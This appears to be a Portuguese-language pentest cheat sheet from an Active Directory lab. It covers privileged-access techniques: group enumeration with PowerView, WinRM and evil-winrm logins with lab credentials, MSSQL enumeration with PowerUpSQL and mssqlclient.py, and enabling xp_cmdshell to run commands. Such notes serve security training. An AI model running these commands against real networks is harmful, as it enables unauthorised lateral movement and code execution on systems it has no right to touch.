Privileged Access

• Enumerando o grupo de usuários da Área de Trabalho Remota

Get-NetLocalGroupMember -ComputerName ACADEMY-EA-MS01 -GroupName "Remote Desktop Users"

• Enumerando o grupo de usuários de gerenciamento remoto

Get-NetLocalGroupMember -ComputerName ACADEMY-EA-MS01 -GroupName "Remote Management Users"

• Estabelecendo a sessão do WinRM no Windows

$password = ConvertTo-SecureString "Klmcargo2" -AsPlainText -Force
$cred = new-object System.Management.Automation.PSCredential ("INLANEFREIGHT\forend", $password)
Enter-PSSession -ComputerName ACADEMY-EA-MS01 -Credential $cred

• Conectando-se a um destino com Evil-WinRM e credenciais válidas

evil-winrm -i 10.129.201.234 -u forend

• Enumerando instâncias MSSQL com PowerUpSQL

cd .\PowerUpSQL\
Import-Module .\PowerUpSQL.ps1
Get-SQLInstanceDomain

Get-SQLQuery -Verbose -Instance "172.16.5.150,1433" -username "inlanefreight\damundsen" -password "SQL1234!" -query 'Select @@version'

• Correndo mssqlclient.py contra o alvo

mssqlclient.py INLANEFREIGHT/DAMUNDSEN@172.16.5.150 -windows-auth

• Escolhendo enable_xp_cmdshell

SQL> enable_xp_cmdshell

• Enumerando nossos direitos no sistema usando xp_cmdshell

xp_cmdshell whoami /priv